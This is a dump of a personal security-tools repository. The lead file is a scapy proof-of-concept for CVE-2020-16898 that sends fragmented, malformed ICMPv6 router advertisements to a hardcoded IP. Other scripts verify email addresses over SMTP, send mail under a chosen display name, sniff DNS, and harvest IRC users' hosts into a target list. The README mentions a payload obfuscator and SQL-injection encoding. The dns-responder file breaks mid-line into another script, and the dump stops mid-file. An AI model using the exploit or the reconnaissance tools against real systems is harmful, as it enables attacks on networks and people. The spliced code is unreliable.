├── CVEs └── CVE-2020-16898.py ├── DNS ├── host2ip.py └── ip2host.py ├── README.md ├── email ├── ePull ├── email-em └── mx-rip ├── firewall ├── dns-checkDecoder ├── dns-checker ├── dns-decoder ├── dns-responder ├── dns-reverseLookup └── dns-viewer ├── iqt ├── README.md ├── TLDs ├── qti └── qtip ├── stopwatch.py └── strings ├── ascii-me ├── b64.sh └── obfume /CVEs/CVE-2020-16898.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | """ 3 | orig e.dns 4 | e.dns = [ 5 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", 6 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", 7 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", 8 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", 9 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", 10 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", 11 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", 12 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", 13 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", 14 | "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ] 15 | 16 | 17 | My take on the CVE 18 | """ 19 | 20 | import sys 21 | from scapy.all import * 22 | 23 | def frag(l, arm = False): 24 | ## Frag out 25 | for p in range(len(l)): 26 | if arm is True: 27 | send(l[p]) 28 | print(len(l[p])) 29 | 30 | tgt = '192.168.10.241' 31 | p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18" 32 | p_test = p_test_half + 'A'.encode()*4 33 | 34 | 35 | ## Expanded flag options 36 | c = ICMPv6NDOptEFA() 37 | 38 | ## Recursive DNS Server option 39 | e = ICMPv6NDOptRDNSS() 40 | e.len = 21 41 | e.dns = [ 42 | "AAAA:AAAA:AAAA:AAA:AAA:AAA:AAA:A", 43 | "AAAA:AAAA:AAAA:AAA:AAA:AAA:AAA:A", 44 | "AAAA:AAAA:AAAA:AAA:AAA:AAA:AAA:A", 45 | "AAAA:AAAA:AAAA:AAA:AAA:AAA:AAA:A", 46 | "AAAA:AAAA:AAAA:AAA:AAA:AAA:AAA:A", 47 | "AAAA:AAAA:AAAA:AAA:AAA:AAA:AAA:A", 48 | "AAAA:AAAA:AAAA:AAA:AAA:AAA:AAA:A", 49 | "AAAA:AAAA:AAAA:AAA:AAA:AAA:AAA:A", 50 | "AAAA:AAAA:AAAA:AAA:AAA:AAA:AAA:A", 51 | "AAAA:AAAA:AAAA:AAA:AAA:AAA:AAA:A" ] 52 | 53 | ## Router Advertisement / Recursive DNS Server option / Raw bytes 54 | pkt = ICMPv6ND_RA() /\ 55 | ICMPv6NDOptRDNSS(len=8) /\ 56 | Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e 57 | 58 | ## Test fragement 59 | p_test_frag = IPv6(dst = tgt, src = tgt, hlim = 255)/ \ 60 | IPv6ExtHdrFragment()/pkt 61 | 62 | ## Frags 63 | l = fragment6(p_test_frag, 200) 64 | 65 | ## Go 66 | frag(l) 67 | -------------------------------------------------------------------------------- /DNS/host2ip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import csv 4 | import os 5 | import socket 6 | import officeTasks as OT 7 | from easyThread import EasyThread 8 | 9 | def ourThread(self, host): 10 | try: 11 | ipAddress = socket.gethostbyname(host) 12 | hList.append((host, ipAddress)) 13 | except: 14 | hList.append((host, 'N/A')) 15 | 16 | ## Prep 17 | OT.gnr.sweep('output') 18 | os.mkdir('output') 19 | hList = [] 20 | 21 | ## User choices 22 | dList, tgtList = OT.gnr.fileMenu('txt') 23 | print('\n' + dList) 24 | fName = tgtList[int(input('File to parse?\n'))] 25 | 26 | with open(fName, 'r') as iFile: 27 | fContents = list(set(iFile.read().splitlines())) 28 | 29 | ## Add our function to EasyThread 30 | EasyThread.theThread = ourThread 31 | 32 | ## Instantiate using #s other than defaults 33 | et = EasyThread(jobList = fContents, nThread = 15) 34 | 35 | ## Start the work 36 | et.easyLaunch() 37 | 38 | ## Record your findings 39 | OT.csv.csvGen('output/host2ip.csv', ['hostname', 'ip'], hList) 40 | -------------------------------------------------------------------------------- /DNS/ip2host.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import os 4 | import re 5 | import socket 6 | import threading 7 | import officeTasks as OT 8 | from easyThread import EasyThread 9 | 10 | def ourThread(self, ip): 11 | try: 12 | f = socket.gethostbyaddr(ip) 13 | hList.append((f[0], ip)) 14 | except: 15 | hList.append(('N/A', ip)) 16 | 17 | ## Prep 18 | OT.gnr.sweep('output') 19 | os.mkdir('output') 20 | hList = [] 21 | ipList = [] 22 | 23 | ## User choices 24 | dList, tgtList = OT.gnr.fileMenu('txt') 25 | print('\n' + dList) 26 | fName = tgtList[int(input('File to parse?\n'))] 27 | 28 | with open(fName, 'r') as iFile: 29 | fContents = iFile.read().splitlines() 30 | ipSet = set() 31 | ipCapture = re.compile('\\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\b') 32 | for i in fContents: 33 | f = re.findall(ipCapture, i) 34 | for ip in f: 35 | ipSet.add(ip) 36 | 37 | for i in ipSet: 38 | data = '.'.join(i) 39 | ipList.append(data) 40 | 41 | ## Add our function to EasyThread 42 | EasyThread.theThread = ourThread 43 | 44 | ## Instantiate using #s other than defaults 45 | et = EasyThread(jobList = ipList, nThread = 15) 46 | 47 | ## Start the work 48 | et.easyLaunch() 49 | 50 | ## Record your findings 51 | OT.csv.csvGen('output/host2ip.csv', ['hostname', 'ip'], hList) 52 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## DNS 2 | * Useful ways of querying DNS 3 | 4 | ## firewall 5 | * Useful scripts for firewalls 6 | 7 | ## email 8 | ### email-em 9 | * Send an email via the command line 10 | 11 | ### epull 12 | * Verify the existence of an email address 13 | 14 | ### mx-rip 15 | * Rip MX record for a given set of email addresses and do something with it... 16 | 17 | ## iqt 18 | * qti 19 | * Create database of IRC users and do something with it... 20 | * qtip 21 | * Parse the database from qti and do something with it... 22 | 23 | ## stopwatch.py 24 | * Useful time delta stopwatch style module for python. 25 | 26 | ## strings 27 | * Scripts which modify strings of characters 28 | 29 | ### ascii-me 30 | * On-the-fly HEX and ASCII URL converter 31 | 32 | ### b64.sh 33 | * Brute force decoder for base64 encoded strings 34 | * Helps to deal with server-side obfuscation 35 | 36 | ### obfume 37 | * Create an obfuscated payload 38 | -------------------------------------------------------------------------------- /email/ePull: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2.7 2 | 3 | import re, smtplib, sys 4 | from dns.resolver import query 5 | 6 | ## Filename: epull 7 | ## Concept: Verify the existence of an email address 8 | ## Usage: ./epull 9 | ## Author: stryngs 10 | 11 | ## Query mx exchangers 12 | domain = sys.argv[1].split('@')[1] 13 | mxRec = query(domain, 'MX') 14 | mList = [] 15 | for resolver in mxRec: 16 | mList.append(resolver.exchange.to_text()) 17 | 18 | ## Connect and check if email address is real 19 | s = smtplib.SMTP(re.sub('.$', '', mList[0]) + ':25') 20 | s.helo() 21 | fCode, fResponse = s.mail('john@doe.com') 22 | if fCode == 250: 23 | tCode, tResponse = s.rcpt(sys.argv[1]) 24 | if tCode == 250: 25 | print 'Valid Email' 26 | else: 27 | print '%s -- %s' % (tCode, tResponse) 28 | else: 29 | print '%s -- %s' % (fCode, fResponse) 30 | s.quit() 31 | 32 | -------------------------------------------------------------------------------- /email/email-em: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Send an email via python 4 | 5 | import getpass, smtplib 6 | from email.header import Header 7 | from email.mime.text import MIMEText 8 | from email.utils import formataddr 9 | 10 | ## Credz 11 | server = raw_input('SMTP Server?\n') 12 | sender = raw_input('\nUsername?\n') 13 | dName = raw_input('\nDisplay Name? (default is username)\n') 14 | rName = raw_input('\nReply to email? (enter for none)\n') 15 | recipients = raw_input('\nSend to whom? (use commas for multiple recipients)\n') 16 | recipients = [to for to in recipients.split(',')] 17 | subject = raw_input('\nSubject?\n') 18 | body = raw_input('\nBody?\n') 19 | password = getpass.getpass('\nPassword? ') 20 | 21 | ## Server Details 22 | s = smtplib.SMTP(server + ':587') 23 | s.set_debuglevel(1) 24 | s.starttls() 25 | s.login(sender, password) 26 | msg = MIMEText(body) 27 | msg.set_type('text/html') 28 | msg['Subject'] = subject 29 | if not dName: 30 | dName = sender 31 | msg['From'] = formataddr((str(Header(dName)), sender)) 32 | msg['To'] = ", ".join(recipients) 33 | if rName: 34 | msg['reply-to'] = rName 35 | s.sendmail(sender, recipients, msg.as_string()) 36 | s.quit() 37 | -------------------------------------------------------------------------------- /email/mx-rip: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ## Filename: mx-rip 4 | ## Concept: Rip MX record for a given set of email addresses and do something with it... 5 | ## Usage: ./mx-rip 6 | ## Author: stryngs 7 | 8 | import re, os, sys 9 | from dns.resolver import query 10 | import sqlite3 as lite 11 | 12 | try: 13 | filename = sys.argv[1] 14 | except: 15 | print 'Usage: ./mx-rip \n' 16 | sys.exit(1) 17 | 18 | ## Rip domains 19 | with open(filename, 'r') as dFile: 20 | dSet = set() 21 | for entry in dFile: 22 | dSet.add(entry.split('@')[1].strip()) 23 | 24 | ## Test db connection and prep if new db 25 | con = None 26 | try: 27 | con = lite.connect('Records.sqlite') 28 | db = con.cursor() 29 | if con: 30 | db.execute("CREATE TABLE IF NOT EXISTS mx_rec(domain TEXT, mx TEXT)") 31 | con.close() 32 | con = None 33 | except lite.Error, e: 34 | print "Error %s:" % e.args[0] 35 | sys.exit(1) 36 | 37 | ## Open db and begin work 38 | con = lite.connect('Records.sqlite') 39 | db = con.cursor() 40 | 41 | ## Update tables 42 | with con: 43 | ## By domain 44 | for domain in dSet: 45 | mxRec = query(domain, 'MX') 46 | rList = [] 47 | ## By resolver 48 | for resolver in mxRec: 49 | rList.append(resolver.exchange.to_text()) 50 | ## Add the results to the db 51 | for i in rList: 52 | db.execute("INSERT INTO mx_rec VALUES(?, ?);", (domain, i)) 53 | 54 | print 'Finished!' 55 | print 'Filename: Records.sqlite' 56 | print '' 57 | sys.exit(0) 58 | -------------------------------------------------------------------------------- /firewall/dns-checkDecoder: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | Useful for decoding SQL entries made from dns-checker 5 | """ 6 | 7 | import logging, sys 8 | import sqlite3 as lite 9 | from binascii import unhexlify 10 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 11 | from scapy.all import * 12 | 13 | try: 14 | count = sys.argv[1] 15 | except: 16 | print 'Usage:\ndns-decoder \n' 17 | sys.exit(1) 18 | 19 | con = lite.connect('checker.sqlite') 20 | con.text_factory = str 21 | db = con.cursor() 22 | q = db.execute('SELECT\ 23 | `pkt`\ 24 | FROM\ 25 | `packets`\ 26 | WHERE\ 27 | `num` = "{0}"'.format(count)) 28 | hexPkt = q.fetchone()[0] 29 | hexStr = unhexlify(hexPkt.replace(' ', '')) 30 | print [Ether(hexStr)] 31 | -------------------------------------------------------------------------------- /firewall/dns-checker: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | Sort DNSQR by src and dst 5 | 6 | src hits: 7 | cat checker.log | grep src | cut -d: -f2 | cut -d- -f1| sort -u 8 | 9 | dst hits: 10 | cat checker.log | grep dst | cut -d: -f2 | cut -d- -f1| sort -u 11 | """ 12 | 13 | import logging, os, netifaces, signal, subprocess, sys, time 14 | import sqlite3 as lite 15 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 16 | from scapy.all import * 17 | 18 | class SQL(object): 19 | """Use SQL to store the packets""" 20 | 21 | def __init__(self): 22 | self.con = lite.connect('checker.sqlite') 23 | self.con.text_factory = str 24 | self.db = self.con.cursor() 25 | 26 | ## Generate src table 27 | self.db.execute('CREATE TABLE IF NOT EXISTS\ 28 | "packets"("num" INT,\ 29 | "time" TEXT,\ 30 | "type" TEXT,\ 31 | "scount" INT,\ 32 | "dcount" INT,\ 33 | "smac" TEXT,\ 34 | "dmac" TEXT,\ 35 | "sip" TEXT,\ 36 | "dip" TEXT,\ 37 | "pkt" BLOB);') 38 | self.con.commit() 39 | 40 | 41 | def crtlC(srcIPs, dstIPs): 42 | """Handle CTRL+C.""" 43 | def tmp(signal, frame): 44 | print '\n\ncrtl + c detected. Stopping dns-checker' 45 | print 'Final stats:\nsrc: %s\ndst: %s' % (srcIPs, dstIPs) 46 | sys.exit(0) 47 | return tmp 48 | 49 | 50 | def packetParser(sql, myIP, srcIPs, srcDst, dstIPs, dstSrc): 51 | """Notate and store what is going on with DNSQRs""" 52 | def engine(packet): 53 | global pNum 54 | pNum += 1 55 | tm = str(time.time()) 56 | 57 | ## Deal with SRC 58 | if packet[IP].src == myIP: 59 | 60 | ## Log the src and count 61 | pType = 'src' 62 | if srcIPs.get(packet[IP].src) is None: 63 | sCount = 1 64 | srcIPs.update({packet[IP].src: sCount}) 65 | else: 66 | sCount = srcIPs.get(packet[IP].src) + 1 67 | srcIPs.update({packet[IP].src: sCount}) 68 | 69 | ## Log the dst and count 70 | if srcDst.get(packet[IP].dst) is None: 71 | dCount = 1 72 | srcDst.update({packet[IP].dst: dCount}) 73 | else: 74 | dCount = srcDst.get(packet[IP].dst) + 1 75 | srcDst.update({packet[IP].dst: dCount}) 76 | 77 | ## Generate output 78 | oPut = 'dst: %s -- %s / %s -- %s' % (packet[IP].dst, 79 | str(srcDst.get(packet[IP].dst)), 80 | str(srcIPs.get(packet[IP].src)), 81 | pNum) 82 | 83 | ## Deal with DST 84 | else: 85 | 86 | ## Log the dst and count 87 | pType = 'dst' 88 | if dstIPs.get(packet[IP].dst) is None: 89 | dCount = 1 90 | dstIPs.update({packet[IP].dst: dCount}) 91 | else: 92 | dCount = dstIPs.get(packet[IP].dst) + 1 93 | dstIPs.update({packet[IP].dst: dCount}) 94 | 95 | ## Log the src and count 96 | if dstSrc.get(packet[IP].src) is None: 97 | sCount = 1 98 | dstSrc.update({packet[IP].src: sCount}) 99 | else: 100 | sCount = dstSrc.get(packet[IP].src) + 1 101 | dstSrc.update({packet[IP].src: sCount}) 102 | 103 | ## Generate the output 104 | oPut = 'src: %s -- %s / %s -- %s' % (packet[IP].src, 105 | str(dstSrc.get(packet[IP].src)), 106 | str(dstIPs.get(packet[IP].dst)), 107 | pNum) 108 | 109 | 110 | ## Store the packet 111 | sql.db.execute('INSERT INTO\ 112 | "packets"\ 113 | VALUES(?,\ 114 | ?,\ 115 | ?,\ 116 | ?,\ 117 | ?,\ 118 | ?,\ 119 | ?,\ 120 | ?,\ 121 | ?,\ 122 | ?);',\ 123 | (pNum,\ 124 | tm,\ 125 | pType,\ 126 | sCount,\ 127 | dCount,\ 128 | packet[Ether].src,\ 129 | packet[Ether].dst,\ 130 | packet[IP].src,\ 131 | packet[IP].dst,\ 132 | hexstr(str(packet), onlyhex = 1))) 133 | 134 | ## Print the packet 135 | print oPut 136 | 137 | ## Log it 138 | with open('checker.log', 'a') as oFile: 139 | oFile.write(oPut + '\n') 140 | 141 | ## Commit to DB 142 | sql.con.commit() 143 | return engine 144 | 145 | 146 | if __name__ == '__main__': 147 | ## Grab the IP 148 | try: 149 | myIP = netifaces.ifaddresses(sys.argv[1])[2][0]['addr'] 150 | except: 151 | print 'Usage:\ndns-checker \n' 152 | sys.exit(1) 153 | 154 | ## Store the counts 155 | pNum = 0 156 | srcIPs = {} 157 | srcDst = {} 158 | dstIPs = {} 159 | dstSrc = {} 160 | 161 | ## Create the DB 162 | sql = SQL() 163 | 164 | ## Signal handler 165 | signal_handler = crtlC(srcIPs, dstIPs) 166 | signal.signal(signal.SIGINT, signal_handler) 167 | 168 | ## Launch 169 | pHandler = packetParser(sql, myIP, srcIPs, srcDst, dstIPs, dstSrc) 170 | sniff(iface = sys.argv[1], prn=pHandler, lfilter = lambda x: x.haslayer('DNSQR'), store = 0) 171 | -------------------------------------------------------------------------------- /firewall/dns-decoder: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | Useful for decoding entries made from dns-responder 5 | """ 6 | 7 | import logging, sys 8 | from binascii import unhexlify 9 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 10 | from scapy.all import * 11 | 12 | try: 13 | log = sys.argv[1] 14 | ln = int(sys.argv[2]) 15 | except: 16 | print 'Usage:\ndns-decoder \n' 17 | 18 | with open(log, 'r') as iFile: 19 | hits = iFile.read().splitlines() 20 | 21 | hexInput = hits[ln].split(':')[2] 22 | hexStr = unhexlify(hexInput.replace(' ', '')) 23 | print [Ether(hexStr)] 24 | -------------------------------------------------------------------------------- /firewall/dns-responder: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | Useful for blocking or viewing erroneous DNS queries to a Nameserver 5 | 6 | Have to add option for: 7 | - while read lines; do line=$(echo "$lines" | cut -d: -f2); iptables -D INPUT -s "$line" -j DROP; done drops; sed -i 's/A/D/g' drops; sed -i 's/\/32//g' drops; while read lines; do iptables $(echo "$lines"); done 6 | ## Author: stryngs 7 | 8 | import re 9 | import os 10 | import sqlite3 as lite 11 | import sys 12 | 13 | try: 14 | filename = sys.argv[1] 15 | except: 16 | print 'Usage: ./qti \n' 17 | sys.exit(1) 18 | 19 | ## Create byline list from logfile 20 | with open(filename, 'r') as lFile: 21 | lineList = [] 22 | for line in lFile: 23 | lineList.append(line) 24 | 25 | ## Create search functions 26 | ### Currently only works with irssi style logs 27 | def join_search(): 28 | expr = re.compile('^\d{2}:\d{2} -!-.*\[.*?\]\s+has joined\s+#') 29 | return [hit for hit in lineList if expr.match(hit)] 30 | def quit_search(): 31 | expr = re.compile('^\d{2}:\d{2} -!-.*\[.*?\]\s+has quit\s+\[') 32 | return [hit for hit in lineList if expr.match(hit)] 33 | 34 | ## Create list of successful parsings 35 | joinList = list(join_search()) 36 | quitList = list(quit_search()) 37 | 38 | ## Declare join columns 39 | sample = joinList[0].split(' ') 40 | count = 0 41 | for i in sample: 42 | print '%s: %s' % (count, i) 43 | count += 1 44 | print 'You should see a sample join line broken down by columns above' 45 | jNick = raw_input('username column >') 46 | jWhois = raw_input('logged in from column > ') 47 | jChan = raw_input('channel column > ') 48 | print '' 49 | jNick = int(jNick) 50 | jWhois = int(jWhois) 51 | jChan = int(jChan) 52 | 53 | ## Declare quit columns 54 | sample = quitList[0].split(' ') 55 | count = 0 56 | for i in sample: 57 | print '%s: %s' % (count, i) 58 | count += 1 59 | print 'You should see a sample quit line broken down by columns above' 60 | qNick = raw_input('username column >') 61 | qWhois = raw_input('logged in from column > ') 62 | print '' 63 | qNick = int(qNick) 64 | qWhois = int(qWhois) 65 | 66 | ## Test db connection and prep if new db 67 | con = None 68 | try: 69 | con = lite.connect('irc-logs.sqlite') 70 | db = con.cursor() 71 | if con: 72 | db.execute("CREATE TABLE IF NOT EXISTS irc_join(Id INT, nick TEXT, whois TEXT, chan TEXT)") 73 | db.execute("CREATE TABLE IF NOT EXISTS irc_quit(Id INT, nick TEXT, whois TEXT)") 74 | con.close() 75 | con = None 76 | except lite.Error, e: 77 | print "Error %s:" % e.args[0] 78 | sys.exit(1) 79 | 80 | ## JOIN Stuff 81 | ## Create tempfile of desired info 82 | with open('j.tmp', 'w') as jFile: 83 | for i in joinList: 84 | who = i.split(' ')[jNick] 85 | where = i.split(' ')[jWhois] 86 | where = re.sub('(^\[|]$)', '', where) 87 | chan = i.split(' ')[jChan] 88 | chan = re.sub('\\n$', '', chan) 89 | jFile.write(who + " " + where + " " + chan + "\n") 90 | 91 | ## Create byline list of j.tmp 92 | with open('j.tmp', 'r') as jTmp: 93 | jTmpLst = [] 94 | for line in jTmp: 95 | jTmpLst.append(line) 96 | 97 | ## Search and remove duplicates from jTmpLst 98 | joinListSort = sorted(set(jTmpLst)) 99 | 100 | ## QUIT Stuff 101 | ## Create tempfile of desired info 102 | with open('q.tmp', 'w') as qFile: 103 | for i in quitList: 104 | who = i.split(' ')[qNick] 105 | where = i.split(' ')[qWhois] 106 | where = re.sub('(^\[|]$)', '', where) 107 | qFile.write(who + " " + where + "\n") 108 | 109 | ## Create byline list of q.tmp 110 | with open('q.tmp', 'r') as qTmp: 111 | qTmpLst = [] 112 | for line in qTmp: 113 | qTmpLst.append(line) 114 | 115 | ## Search and remove duplicates from qTmpLst 116 | quitListSort = sorted(set(qTmpLst)) 117 | 118 | ## Open db and begin work 119 | con = lite.connect('irc-logs.sqlite') 120 | db = con.cursor() 121 | 122 | ## Update tables 123 | with con: 124 | ## Insert join data 125 | counter=1 126 | for i in joinListSort: 127 | who = i.split(' ')[0] 128 | where = i.split(' ')[1] 129 | where = re.sub('(^\[|]$)', '', where) 130 | chan = i.split(' ')[2] 131 | chan = re.sub('\\n$', '', chan) 132 | db.execute("INSERT INTO irc_join VALUES(?, ?, ?, ?);", (counter, who, where, chan)) 133 | counter += 1 134 | 135 | ## Insert quit data 136 | counter=1 137 | for i in quitListSort: 138 | who = i.split(' ')[0] 139 | where = i.split(' ')[1] 140 | where = re.sub('(^\[|]$)', '', where) 141 | db.execute("INSERT INTO irc_quit VALUES(?, ?, ?);", (counter, who, where)) 142 | counter += 1 143 | 144 | ## Cleanup 145 | os.remove('j.tmp') 146 | os.remove('q.tmp') 147 | print 'Finished!' 148 | print 'Filename: irc-logs.sqlite' 149 | print '' 150 | sys.exit(0) 151 | -------------------------------------------------------------------------------- /iqt/qtip: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ## Filename: qtip [Query 'teh IRC Parser] 4 | ## Concept: Parse the database from qti and do something with it... 5 | ## Usage: ./qtip 6 | ## Author: stryngs 7 | 8 | import os 9 | import re 10 | import sqlite3 as lite 11 | import sys 12 | 13 | ## Open db and begin work 14 | con = lite.connect('irc-logs.sqlite') 15 | db = con.cursor() 16 | 17 | ## Import TLDs 18 | with open ('TLDs', 'r') as tldFile: 19 | tldList = [] 20 | for line in tldFile: 21 | line = line.strip() 22 | line = '\.' + line + '$' 23 | tldList.append(line) 24 | print '1. TLD import complete' 25 | 26 | ## Create set of whois info from db 27 | dbSet = set() 28 | with open ('tmp.lst', 'w') as tFile: 29 | with con: 30 | db.execute("SELECT whois FROM irc_join;") 31 | while True: 32 | row = db.fetchone() 33 | if row == None: 34 | break 35 | row = str(row[0]).split('@')[1].strip().lower() 36 | dbSet.add(row) 37 | db.execute("SELECT whois from irc_quit;") 38 | while True: 39 | row = db.fetchone() 40 | if row == None: 41 | break 42 | row = str(row[0]).split('@')[1].strip().lower() 43 | dbSet.add(row) 44 | print '2. dbSet created' 45 | 46 | ## Convert dbSet to dbList 47 | dbList = [] 48 | for row in dbSet: 49 | dbList.append(row) 50 | print '3. dbList conversion done' 51 | print '4. Starting domain storage' 52 | 53 | ## Grab domains from dbList 54 | with open ('target.lst', 'w') as tFile: 55 | for tld in tldList: 56 | for row in dbList: 57 | if re.search(tld, row): 58 | ###print 'Domain detected: %s' % row 59 | tFile.write(row + "\n") 60 | print '5. Domains stored' 61 | 62 | ## Strip out empty line 63 | file('tmp.lst', 'w').write(file('target.lst').read().strip()) 64 | 65 | ## Convert tmp.lst to just the domain and tld, removing any duplicates 66 | dup = set() 67 | with open('target.lst', 'w') as oFile: 68 | with open('tmp.lst', 'r') as iFile: 69 | for line in iFile: 70 | dot = line.split('.') 71 | domain = dot[-2] 72 | tld = dot[-1] 73 | tgt = '%s.%s' % (domain,tld) 74 | dup.add(tgt) 75 | for i in dup: 76 | oFile.write(i.strip() + "\n") 77 | print '6. Domains parsed' 78 | 79 | ## Remove final duplicates and cleanup 80 | os.remove('tmp.lst') 81 | lines = open('target.lst', 'r').readlines() 82 | lines_set = set(lines) 83 | l = [] 84 | for i in lines_set: 85 | l.append(i) 86 | l = sorted(l) 87 | with open('tmp.lst', 'w') as oFile: 88 | for line in l: 89 | oFile.write(line) 90 | file('target.lst', 'w').write(file('tmp.lst').read().strip()) 91 | os.remove('tmp.lst') 92 | print '' 93 | print 'Finished!' 94 | print 'Filename: target.lst' 95 | print '' 96 | sys.exit(0) 97 | -------------------------------------------------------------------------------- /stopwatch.py: -------------------------------------------------------------------------------- 1 | import time 2 | 3 | class Stopwatch(object): 4 | """A stopwatch class for tracking time deltas. 5 | 6 | When this class is instantiated, the default is to create a list for 7 | tracking of time via a "button press". To allow for multiple things to be 8 | concurrently tracked within the same object, a dictionary is used. 9 | The thought behind the dictionary is to allow for a single instance of the 10 | Stopwatch class, using a keyword, to track button presses based upon 11 | that specific keyword. This alleviates the need for multiple instances to 12 | be generated for the Stopwatch class. This feature allows for the 13 | stopwatch to be created once, and then modified as needed, on-the-fly. 14 | 15 | It is important to note that clickMonitor and timeKeeper operate using 16 | different counting indexes. While the first button press for a given 17 | object will always be a 1, the corresponding time at which the button press 18 | was mapped is n-1. In other words, if clickMonitor shows 10 clicks, then 19 | the highest index in timeKeeper would be 9. 20 | 21 | Pieces of the Stopwatch are created during instantiation as follows: 22 | - A timeKeeper object (This keeps track of time) 23 | - list (default) 24 | -OR- 25 | - dictionary 26 | - a clickMonitor object (Keeps track of individual button presses) 27 | 28 | Methods of the Stopwatch class: 29 | - button 30 | Serves as an all-in-one "button" for the user to press. It does not 31 | recognize the concept of start and stop, it serves merely to notate 32 | the point in time, at which a user "pressed" it. When the button 33 | is pressed, 1 is added to the current clickMonitor object. 34 | Pressing of the button is accomplished as such: 35 | - button() 36 | -OR- 37 | - button() 38 | 39 | - delta 40 | Serves as a rudimentary subtraction tool using a start and end 41 | concept. To obtain a delta, simply do: 42 | - delta(startTime, endTime) (List style) 43 | -OR- 44 | - delta( ,startTime, endTime) (Dictionary) 45 | 46 | - reset 47 | Allows the user to hit the "reset" button. Will work for list or 48 | dictionary format. Useful in that re-instantiation is not needed. 49 | Uses a try/pass concept so that resetting can be done without 50 | prior existence. 51 | Concept: 52 | - reset() 53 | -OR- 54 | - reset() 55 | 56 | Examples of usage: 57 | - list (Useful for tracking only a single "thing") 58 | import random, stopwatch 59 | listWatch = Stopwatch() 60 | print('Initial button') 61 | listWatch.button() 62 | time.sleep(random.randint(1,10)) 63 | print('Second button') 64 | listWatch.button() 65 | print('The delta is: {0}'.format(listWatch.delta(0, 1))) 66 | 67 | - dictionary (Useful for tracking multiple "things") 68 | import random, stopwatch 69 | dictWatch = stopwatch.Stopwatch(option = 'multi') 70 | print('Initial button') 71 | dictWatch.button('foo') 72 | time.sleep(random.randint(1, 10)) 73 | print('Second button') 74 | dictWatch.button('foo') 75 | print('The delta for foo is: {0}'.format(dictWatch.delta('foo', 0, 1))) 76 | dictWatch.button('bar') 77 | dictWatch.button('bar') 78 | dictWatch.button('bar') 79 | print(dictWatch.timeKeeper) 80 | """ 81 | 82 | def __init__(self, **kwargs): 83 | """Generate the body of the watch""" 84 | if not 'option' in kwargs: 85 | self.timeKeeper = [] 86 | self.clickMonitor = 0 87 | else: 88 | if kwargs['option'] == 'multi': 89 | self.timeKeeper = {} 90 | self.clickMonitor = {} 91 | else: 92 | self.timeKeeper = [] 93 | self.clickMonitor = 0 94 | 95 | 96 | def button(self, *args): 97 | """Button press method""" 98 | buttonPress = time.time() 99 | 100 | if type(self.timeKeeper) is list: 101 | self.timeKeeper.append(buttonPress) 102 | self.clickMonitor += 1 103 | else: 104 | 105 | ## Deal with first instance of dict being clicked 106 | if not args[0] in self.clickMonitor.keys(): 107 | self.timeKeeper.update({args[0]: {0: buttonPress}}) 108 | self.clickMonitor.update({args[0]: 1}) 109 | 110 | ## Add a click for dict already in use 111 | else: 112 | self.clickMonitor.update({args[0]: self.clickMonitor[args[0]] + 1}) 113 | self.timeKeeper[args[0]].update({self.clickMonitor[args[0]] - 1: buttonPress}) 114 | 115 | 116 | def delta(self, *args): 117 | """Simple method for performing time-based subtraction""" 118 | if type(self.timeKeeper) is list: 119 | startSlot = args[0] 120 | endSlot = args[1] 121 | return self.timeKeeper[endSlot] - self.timeKeeper[startSlot] 122 | else: 123 | title = args[0] 124 | startSlot = args[1] 125 | endSlot = args[2] 126 | return self.timeKeeper[title][endSlot] - self.timeKeeper[title][startSlot] 127 | 128 | 129 | def reset(self, *args): 130 | """Method to allow for reset of the watch, without reinstantiation""" 131 | if type(self.timeKeeper) is list: 132 | try: 133 | self.timeKeeper = [] 134 | self.clickMonitor = 0 135 | except: 136 | pass 137 | else: 138 | try: 139 | del self.timeKeeper[args[0]] 140 | del self.clickMonitor[args[0]] 141 | except: 142 | pass 143 | -------------------------------------------------------------------------------- /strings/ascii-me: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Concept ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## 4 | ## Filename: ascii-me 5 | 6 | ## This script will allow a user to quickly and easily encode an ascii string in hex 7 | ## This script can be used for things like SQL injection engagements and whatnot 8 | 9 | ## For further details, check the bottom of this file 10 | ##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## 11 | import argparse 12 | from collections import 